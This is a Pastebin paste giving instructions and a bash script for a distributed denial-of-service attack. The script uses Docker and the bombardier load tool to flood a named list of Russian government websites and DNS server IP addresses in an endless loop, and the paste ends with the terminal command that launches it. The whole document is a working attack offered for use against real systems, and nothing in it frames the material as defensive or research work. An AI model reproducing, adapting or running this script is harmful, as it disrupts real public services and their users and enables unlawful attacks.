Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Open the Docker Desktop application, then:
- 1. Click Images in the left sidebar
- 2. Search alpine
- 3. On the right will be the Run button - it must be pressed and run the image
- Then copy the text below and save the file named ddos.sh to your desktop
- Code:
- #!/bin/bash -x
- DESTS=( "http://duma.gov.ru/" "http://president-sovet.ru/" "https://sovetnational.ru/" "https://www.gosuslugi.ru/ru/" "https://zakupki.gov.ru/epz/main/public/home.html" "https://gossluzhba.gov.ru/" "http://defence.council.gov.ru/" "http://budget.council.gov.ru/" "http://www.kremlin.ru/" "https://government.ru/" "http://www.scrf.gov.ru/" "http://www.ksrf.ru/ru/Pages/default.aspx" "http://www.vsrf.ru/" "http://premier.gov.ru/events/" "https://www.mchs.gov.ru/" "https://minjust.gov.ru/ru/" "http://www.fsb.ru/" "https://rosguard.gov.ru/" "https://customs.gov.ru/" "https://udprf.ru/" "http://favt.gov.ru/" "http://194.67.2.109:53/UDP" "http://194.67.7.1:53/UDP" "http://194.54.14.187:53/UDP" "http://194.54.14.186:53/UDP" )
- TIME="180s"
- while TRUE
- do
- for DEST in ${DESTS[@]}
- do
- docker run -ti --rm alpine/bombardier -c 1000 -d $TIME -l $DEST
- done
- done
-
- Step 3. In the application "Terminal" we write the command:
- cd Desktop / && chmod + x ddos.sh && sh ddos.sh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement